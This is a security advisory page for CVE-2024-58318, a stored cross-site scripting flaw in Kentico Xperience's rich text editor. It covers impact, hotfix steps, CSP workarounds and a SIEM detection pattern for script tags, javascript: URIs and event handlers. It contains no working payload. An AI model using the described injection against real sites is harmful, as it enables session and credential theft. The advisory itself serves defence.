CVE-2024-58318 – A stored cross-site scripting vulnerability in ... (How to Fix)

Q: What is the severity of CVE-2024-58318?

CVE-2024-58318 has a CVSS score of 6.1 (MEDIUM). A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts through the rich text editor component. This could enable attackers to execute arbitrary JavaScript in users' browsers when they view affected pages or forms. Organizations using Kentico Xperience with the vulnerable rich text editor component are affected.

📋 TL;DR

A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts through the rich text editor component. This could enable attackers to execute arbitrary JavaScript in users' browsers when they view affected pages or forms. Organizations using Kentico Xperience with the vulnerable rich text editor component are affected.

💻 Affected Systems

Products:

Kentico Xperience

Versions: Specific versions not detailed in provided references, but hotfixes are available

Operating Systems: Windows, Linux

Default Config Vulnerable: ⚠️ Yes

Notes: Affects the rich text editor component used in page and form builders

📦 What is this software?

Xperience by Kentico

View all CVEs affecting Xperience →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal session cookies, redirect users to malicious sites, perform actions on behalf of authenticated users, or deploy malware through the compromised application.

🟠

Likely Case

Attackers with access to content editing capabilities could inject malicious scripts that execute when other users view affected content, potentially leading to session hijacking or credential theft.

🟢

If Mitigated

With proper input validation and output encoding, malicious scripts would be neutralized before reaching users' browsers.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

Requires access to content editing functionality; exploitation involves injecting malicious URIs through the rich text editor

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Available via hotfix download

Vendor Advisory: https://devnet.kentico.com/download/hotfixes

Restart Required: Yes

Instructions:

1. Download the appropriate hotfix from Kentico DevNet. 2. Apply the hotfix to your Kentico Xperience installation. 3. Restart the application/services. 4. Test the rich text editor functionality.

🔧 Temporary Workarounds

Disable rich text editor for untrusted users

all

Restrict access to the rich text editor component to trusted administrators only

Implement content security policy

all

Add Content-Security-Policy headers to restrict script execution

Content-Security-Policy: script-src 'self'

🧯 If You Can't Patch

Implement strict input validation on all rich text editor inputs
Enable output encoding for all content rendered from the rich text editor

🔍 How to Verify

Check if Vulnerable:

Test if malicious scripts can be injected through the rich text editor and persist when content is saved and reloaded

Check Version:

Check Kentico Xperience administration panel for version information

Verify Fix Applied:

Attempt to inject malicious scripts through the rich text editor after applying the hotfix; scripts should be neutralized or prevented

📡 Detection & Monitoring

Log Indicators:

Unusual content submissions through rich text editor
Suspicious script tags or JavaScript in content storage

Network Indicators:

Unexpected external script loads from application pages
Suspicious redirects from application URLs

SIEM Query:

Search for content containing script tags, javascript: URIs, or on* event handlers in application content logs

📊 Metadata

CVE ID: CVE-2024-58318

CVSS v3 Score: 6.1 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CWE: CWE-79

EPSS Score: 0.03% exploit probability (9.5th percentile)

Published: December 18, 2025

Last Updated: December 27, 2025

🔗 References

https://devnet.kentico.com/download/hotfixes Product
https://www.vulncheck.com/advisories/kentico-xperience-rich-text-editor-stored-xss Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-58318, you might also want to check these: